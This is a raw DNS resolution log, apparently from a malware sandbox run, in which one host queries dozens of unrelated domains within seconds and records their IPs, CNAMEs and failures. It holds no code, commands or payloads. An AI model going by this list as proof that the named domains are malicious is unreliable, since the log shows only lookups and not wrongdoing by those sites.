                                                                                                                                                                              Sep 15, 2023 07:27:44.662796974 CEST8.8.8.8192.168.2.30x439dNo error (0)yoruksut.com93.187.206.66A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:44.716814041 CEST8.8.8.8192.168.2.30x33e3Server failure (2)avc.com.sanonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:44.744925976 CEST8.8.8.8192.168.2.30xc3f1No error (0)www.fnw.usfnw.usCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:44.744925976 CEST8.8.8.8192.168.2.30xc3f1No error (0)fnw.us137.118.26.67A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:44.753922939 CEST8.8.8.8192.168.2.30x392aName error (3)arowines.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:44.777904034 CEST8.8.8.8192.168.2.30x9e09No error (0)alexpope.biz76.74.184.61A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:44.803220034 CEST8.8.8.8192.168.2.30x37c4No error (0)ssm.ch93.189.66.202A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:44.883420944 CEST8.8.8.8192.168.2.30xe3bdServer failure (2)avc.com.sanonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:44.883783102 CEST8.8.8.8192.168.2.30xaa62No error (0)lyto.net172.67.138.3A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:44.883783102 CEST8.8.8.8192.168.2.30xaa62No error (0)lyto.net104.21.62.182A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:44.935883045 CEST8.8.8.8192.168.2.30x2306No error (0)xult.org65.52.128.33A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:44.947532892 CEST8.8.8.8192.168.2.30x30f3No error (0)cqdgroup.com221.132.33.88A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:44.971777916 CEST8.8.8.8192.168.2.30x136eNo error (0)peminet.net198.54.117.242A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:45.076694965 CEST8.8.8.8192.168.2.30x35dcNo error (0)kewlmail.com63.251.106.25A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:45.078675985 CEST8.8.8.8192.168.2.30xe58cNo error (0)bidroll.com13.56.33.8A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:45.109314919 CEST8.8.8.8192.168.2.30xf8a3No error (0)dspears.comtraff-3.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:45.109314919 CEST8.8.8.8192.168.2.30xf8a3No error (0)traff-3.hugedomains.comhdr-nlb4-0bbd2e21834cb637.elb.us-east-2.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:45.109314919 CEST8.8.8.8192.168.2.30xf8a3No error (0)hdr-nlb4-0bbd2e21834cb637.elb.us-east-2.amazonaws.com3.18.7.81A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:45.109314919 CEST8.8.8.8192.168.2.30xf8a3No error (0)hdr-nlb4-0bbd2e21834cb637.elb.us-east-2.amazonaws.com3.19.116.195A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:45.126118898 CEST8.8.8.8192.168.2.30xf44bNo error (0)btsi.com.ph69.46.30.77A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:45.203865051 CEST8.8.8.8192.168.2.30xa7dcNo error (0)top1oil.com172.67.71.55A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:45.203865051 CEST8.8.8.8192.168.2.30xa7dcNo error (0)top1oil.com104.26.1.82A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:45.203865051 CEST8.8.8.8192.168.2.30xa7dcNo error (0)top1oil.com104.26.0.82A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:45.233022928 CEST8.8.8.8192.168.2.30xcdc6No error (0)roewer.de45.142.176.225A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:45.328411102 CEST8.8.8.8192.168.2.30x4f06No error (0)assideum.com52.219.80.107A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:45.328411102 CEST8.8.8.8192.168.2.30x4f06No error (0)assideum.com52.219.84.155A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:45.328411102 CEST8.8.8.8192.168.2.30x4f06No error (0)assideum.com52.219.143.40A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:45.328411102 CEST8.8.8.8192.168.2.30x4f06No error (0)assideum.com52.219.97.212A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:45.328411102 CEST8.8.8.8192.168.2.30x4f06No error (0)assideum.com52.219.176.96A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:45.328411102 CEST8.8.8.8192.168.2.30x4f06No error (0)assideum.com52.219.100.252A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:45.328411102 CEST8.8.8.8192.168.2.30x4f06No error (0)assideum.com52.219.80.195A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:45.328411102 CEST8.8.8.8192.168.2.30x4f06No error (0)assideum.com52.219.106.176A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:45.339612007 CEST8.8.8.8192.168.2.30x6304No error (0)listel.co.jp49.212.243.77A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:45.355397940 CEST8.8.8.8192.168.2.30x5e66No error (0)ncn.de46.30.60.158A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:45.356544018 CEST8.8.8.8192.168.2.30x2befNo error (0)cvswl.org104.21.55.151A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:45.356544018 CEST8.8.8.8192.168.2.30x2befNo error (0)cvswl.org172.67.149.45A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:45.403281927 CEST8.8.8.8192.168.2.30x4b89No error (0)cbaben.com173.205.126.33A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:45.405838966 CEST8.8.8.8192.168.2.30xc418No error (0)nme.co.jp203.0.113.0A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:45.414681911 CEST8.8.8.8192.168.2.30xb01cNo error (0)pertex.com185.151.30.147A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:45.417043924 CEST8.8.8.8192.168.2.30x515aNo error (0)willsub.com69.89.107.122A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:45.469810963 CEST8.8.8.8192.168.2.30xb96fNo error (0)hchc.org34.224.10.110A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:45.469810963 CEST8.8.8.8192.168.2.30xb96fNo error (0)hchc.org52.11.37.152A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:45.475987911 CEST8.8.8.8192.168.2.30xd37eServer failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:45.492269993 CEST8.8.8.8192.168.2.30xb330No error (0)mjrcpas.com204.11.56.50A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:45.574647903 CEST8.8.8.8192.168.2.30x45d5No error (0)reproar.com194.143.194.23A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:45.666271925 CEST8.8.8.8192.168.2.30x2faaNo error (0)infotech.pl79.96.32.254A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:45.776952982 CEST8.8.8.8192.168.2.30x71b4Server failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:45.783035040 CEST8.8.8.8192.168.2.30x80d4No error (0)t-mould.com81.169.145.175A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:45.815802097 CEST8.8.8.8192.168.2.30xd297No error (0)ludea.cz46.8.8.200A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:45.816704035 CEST8.8.8.8192.168.2.30xfa6dNo error (0)k-nikko.com13.113.204.223A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:45.816704035 CEST8.8.8.8192.168.2.30xfa6dNo error (0)k-nikko.com18.179.184.212A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:45.818869114 CEST8.8.8.8192.168.2.30xd845No error (0)midap.com198.49.23.145A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:45.818869114 CEST8.8.8.8192.168.2.30xd845No error (0)midap.com198.185.159.145A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:45.818869114 CEST8.8.8.8192.168.2.30xd845No error (0)midap.com198.49.23.144A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:45.818869114 CEST8.8.8.8192.168.2.30xd845No error (0)midap.com198.185.159.144A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:45.831947088 CEST8.8.8.8192.168.2.30x9912No error (0)simetar.com104.21.79.166A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:45.831947088 CEST8.8.8.8192.168.2.30x9912No error (0)simetar.com172.67.146.154A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:45.842864990 CEST8.8.8.8192.168.2.30x32b8No error (0)anduran.comtraff-2.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:45.842864990 CEST8.8.8.8192.168.2.30x32b8No error (0)traff-2.hugedomains.comhdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:45.842864990 CEST8.8.8.8192.168.2.30x32b8No error (0)hdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.com3.130.253.23A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:45.842864990 CEST8.8.8.8192.168.2.30x32b8No error (0)hdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.com3.130.204.160A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:45.891177893 CEST8.8.8.8192.168.2.30xc5a8Name error (3)www.owsports.canonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:45.908611059 CEST8.8.8.8192.168.2.30xbefeNo error (0)smitko.net31.15.12.103A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:45.955550909 CEST8.8.8.8192.168.2.30xcf94Server failure (2)webband.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:45.999541998 CEST8.8.8.8192.168.2.30x20d5No error (0)gujarat.com172.67.145.148A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:45.999541998 CEST8.8.8.8192.168.2.30x20d5No error (0)gujarat.com104.21.73.143A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:46.052328110 CEST8.8.8.8192.168.2.30x57eaNo error (0)forbin.net104.21.41.152A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:46.052328110 CEST8.8.8.8192.168.2.30x57eaNo error (0)forbin.net172.67.148.35A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:46.189050913 CEST8.8.8.8192.168.2.30xf264No error (0)angework.com219.94.128.87A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:46.220455885 CEST8.8.8.8192.168.2.30x8a2aNo error (0)gbmfg.com151.101.2.132A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:46.220455885 CEST8.8.8.8192.168.2.30x8a2aNo error (0)gbmfg.com151.101.66.132A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:46.220455885 CEST8.8.8.8192.168.2.30x8a2aNo error (0)gbmfg.com151.101.130.132A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:46.220455885 CEST8.8.8.8192.168.2.30x8a2aNo error (0)gbmfg.com151.101.194.132A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:46.307158947 CEST8.8.8.8192.168.2.30xaa08No error (0)bount.com.tw104.21.76.140A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:46.307158947 CEST8.8.8.8192.168.2.30xaa08No error (0)bount.com.tw172.67.196.25A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:46.493444920 CEST8.8.8.8192.168.2.30xd37eServer failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:46.507611990 CEST8.8.8.8192.168.2.30xcbe8No error (0)wanoa.com164.90.244.158A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:46.507611990 CEST8.8.8.8192.168.2.30xcbe8No error (0)wanoa.com159.89.244.183A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:46.650528908 CEST8.8.8.8192.168.2.30x8f53No error (0)wantapc.net157.7.107.49A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:46.852895975 CEST8.8.8.8192.168.2.30x9375Server failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:46.899135113 CEST8.8.8.8192.168.2.30xf87dNo error (0)skgm.ru91.201.52.102A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:46.908448935 CEST8.8.8.8192.168.2.30xabacName error (3)www.jroy.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:46.976185083 CEST8.8.8.8192.168.2.30xf8f0No error (0)peminet.net198.54.117.242A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:46.978269100 CEST8.8.8.8192.168.2.30xe03aNo error (0)leapc.com35.231.13.148A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:47.020237923 CEST8.8.8.8192.168.2.30x63aaServer failure (2)actmin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:47.063165903 CEST8.8.8.8192.168.2.30x59e6No error (0)btsi.com.ph69.46.30.77A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:47.145562887 CEST8.8.8.8192.168.2.30x9e4aNo error (0)adventist.ro49.12.155.123A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:47.167104006 CEST8.8.8.8192.168.2.30x61f2No error (0)websy.com13.248.169.48A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:47.167104006 CEST8.8.8.8192.168.2.30x61f2No error (0)websy.com76.223.54.146A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:47.187746048 CEST8.8.8.8192.168.2.30xf74fServer failure (2)webband.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:47.225100994 CEST8.8.8.8192.168.2.30x6416No error (0)redgiga.com172.67.186.153A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:47.225100994 CEST8.8.8.8192.168.2.30x6416No error (0)redgiga.com104.21.76.38A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:47.281408072 CEST8.8.8.8192.168.2.30xd884No error (0)semuk.com86.105.245.69A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:47.364846945 CEST8.8.8.8192.168.2.30x8a98Server failure (2)webband.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:47.475696087 CEST8.8.8.8192.168.2.30x969dNo error (0)www.synetik.netsynetik.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:47.475696087 CEST8.8.8.8192.168.2.30x969dNo error (0)synetik.net193.166.255.171A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:47.542768955 CEST8.8.8.8192.168.2.30x3f6aNo error (0)ccrsi.org198.209.253.30A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:47.542835951 CEST8.8.8.8192.168.2.30xf881No error (0)ftchat.com172.67.140.52A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:47.542835951 CEST8.8.8.8192.168.2.30xf881No error (0)ftchat.com104.21.46.148A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:47.866409063 CEST8.8.8.8192.168.2.30x9375Server failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:47.885498047 CEST8.8.8.8192.168.2.30x2bedNo error (0)skgm.ru91.201.52.102A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:47.923773050 CEST8.8.8.8192.168.2.30xa8c2No error (0)plaske.ua5.181.161.11A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:47.975284100 CEST8.8.8.8192.168.2.30xc2bfNo error (0)cnti.krsn.ru217.74.161.133A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:48.007695913 CEST8.8.8.8192.168.2.30x63aaServer failure (2)actmin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:48.066817045 CEST8.8.8.8192.168.2.30xabbdNo error (0)com-edit.fr63.251.106.25A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:48.124104977 CEST8.8.8.8192.168.2.30xac65No error (0)cpmteam.com104.21.32.240A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:48.124104977 CEST8.8.8.8192.168.2.30xac65No error (0)cpmteam.com172.67.188.75A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:48.154239893 CEST8.8.8.8192.168.2.30xf74fServer failure (2)webband.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:48.200366020 CEST8.8.8.8192.168.2.30xff28Server failure (2)awfraser.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:48.245698929 CEST8.8.8.8192.168.2.30x3be9No error (0)bd-style.com103.112.69.92A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:48.272984982 CEST8.8.8.8192.168.2.30x865dNo error (0)roewer.de45.142.176.225A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:48.295306921 CEST8.8.8.8192.168.2.30xf54cNo error (0)akr.co.id104.20.123.68A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:48.295306921 CEST8.8.8.8192.168.2.30xf54cNo error (0)akr.co.id104.20.122.68A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:48.295306921 CEST8.8.8.8192.168.2.30xf54cNo error (0)akr.co.id172.67.33.252A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:48.308787107 CEST8.8.8.8192.168.2.30xde0eNo error (0)ccssinc.com104.21.19.68A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:48.308787107 CEST8.8.8.8192.168.2.30xde0eNo error (0)ccssinc.com172.67.185.152A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:48.343173981 CEST8.8.8.8192.168.2.30x7bd1No error (0)workplus.hu81.0.97.108A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:48.347964048 CEST8.8.8.8192.168.2.30x508dNo error (0)oaith.ca192.124.249.12A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:48.368757963 CEST8.8.8.8192.168.2.30x972eNo error (0)forbin.net104.21.41.152A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:48.368757963 CEST8.8.8.8192.168.2.30x972eNo error (0)forbin.net172.67.148.35A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:48.414474010 CEST8.8.8.8192.168.2.30x8aNo error (0)akr.co.id104.20.122.68A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:48.414474010 CEST8.8.8.8192.168.2.30x8aNo error (0)akr.co.id104.20.123.68A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:48.414474010 CEST8.8.8.8192.168.2.30x8aNo error (0)akr.co.id172.67.33.252A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:48.508493900 CEST8.8.8.8192.168.2.30xd37eServer failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:48.576858044 CEST8.8.8.8192.168.2.30x84acNo error (0)thiessen.net62.75.251.116A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:48.616529942 CEST8.8.8.8192.168.2.30x4653Name error (3)arowines.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:48.617254019 CEST8.8.8.8192.168.2.30x21a9No error (0)oozkranj.com212.44.102.75A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:48.716376066 CEST8.8.8.8192.168.2.30xda75No error (0)missnue.com104.21.234.121A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:48.716376066 CEST8.8.8.8192.168.2.30xda75No error (0)missnue.com104.21.234.120A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:48.756177902 CEST8.8.8.8192.168.2.30xb251No error (0)xult.org65.52.128.33A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:48.846992970 CEST8.8.8.8192.168.2.30x2f54Name error (3)www.udesign.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:48.860819101 CEST8.8.8.8192.168.2.30x6206No error (0)refintl.org198.49.23.144A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:48.860819101 CEST8.8.8.8192.168.2.30x6206No error (0)refintl.org198.185.159.145A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:48.860819101 CEST8.8.8.8192.168.2.30x6206No error (0)refintl.org198.185.159.144A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:48.860819101 CEST8.8.8.8192.168.2.30x6206No error (0)refintl.org198.49.23.145A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:48.864037037 CEST8.8.8.8192.168.2.30x2debNo error (0)tbvlugus.nl174.129.25.170A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:48.866705894 CEST8.8.8.8192.168.2.30xac35No error (0)duiops.net135.125.108.170A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:48.874613047 CEST8.8.8.8192.168.2.30x570fNo error (0)calvinly.com216.239.38.21A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:48.874613047 CEST8.8.8.8192.168.2.30x570fNo error (0)calvinly.com216.239.34.21A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:48.874613047 CEST8.8.8.8192.168.2.30x570fNo error (0)calvinly.com216.239.36.21A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:48.874613047 CEST8.8.8.8192.168.2.30x570fNo error (0)calvinly.com216.239.32.21A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:48.884327888 CEST8.8.8.8192.168.2.30x9375Server failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:49.009882927 CEST8.8.8.8192.168.2.30x63aaServer failure (2)actmin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:49.060657024 CEST8.8.8.8192.168.2.30xabbdNo error (0)com-edit.fr63.251.106.25A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:49.068470955 CEST8.8.8.8192.168.2.30xabbdNo error (0)com-edit.fr63.251.106.25A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:49.103344917 CEST8.8.8.8192.168.2.30xc0bfNo error (0)cpmteam.com104.21.32.240A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:49.103344917 CEST8.8.8.8192.168.2.30xc0bfNo error (0)cpmteam.com172.67.188.75A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:49.104501009 CEST8.8.8.8192.168.2.30xa315No error (0)tcpoa.com164.90.244.158A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:49.104501009 CEST8.8.8.8192.168.2.30xa315No error (0)tcpoa.com159.89.244.183A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:49.110490084 CEST8.8.8.8192.168.2.30x2be0Name error (3)89gospel.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:49.219443083 CEST8.8.8.8192.168.2.30x49b9Name error (3)89gospel.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:49.262908936 CEST8.8.8.8192.168.2.30x3434No error (0)scintel.com23.239.201.14A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:49.324131966 CEST8.8.8.8192.168.2.30x45f8Name error (3)89gospel.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:49.420567989 CEST8.8.8.8192.168.2.30xa70bNo error (0)icd-host.com192.252.159.116A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:49.420567989 CEST8.8.8.8192.168.2.30xa70bNo error (0)icd-host.com192.252.159.165A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:49.450072050 CEST8.8.8.8192.168.2.30xad2fNo error (0)jabian.com104.26.6.17A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:49.450072050 CEST8.8.8.8192.168.2.30xad2fNo error (0)jabian.com104.26.7.17A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:49.450072050 CEST8.8.8.8192.168.2.30xad2fNo error (0)jabian.com172.67.71.13A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:49.526108980 CEST8.8.8.8192.168.2.30xc2b0No error (0)avse.hu185.129.138.60A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:49.528125048 CEST8.8.8.8192.168.2.30x1a1Name error (3)haigh-me.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:49.567841053 CEST8.8.8.8192.168.2.30x579eNo error (0)nlcv.bas.bg195.96.252.188A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:49.598040104 CEST8.8.8.8192.168.2.30x2406Server failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:49.620923996 CEST8.8.8.8192.168.2.30x549bNo error (0)araax.comtraff-5.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:49.620923996 CEST8.8.8.8192.168.2.30x549bNo error (0)traff-5.hugedomains.comhdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:49.620923996 CEST8.8.8.8192.168.2.30x549bNo error (0)hdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.com34.205.242.146A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:49.620923996 CEST8.8.8.8192.168.2.30x549bNo error (0)hdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.com54.161.222.85A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:49.648782015 CEST8.8.8.8192.168.2.30xcaf1Name error (3)haigh-me.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:49.769397020 CEST8.8.8.8192.168.2.30x5bceName error (3)haigh-me.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:49.845381975 CEST8.8.8.8192.168.2.30xc3b2No error (0)alexpope.biz76.74.184.61A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:49.969944954 CEST8.8.8.8192.168.2.30x4e4eServer failure (2)webband.comnonenoneA (IP address)IN (0x0001)false
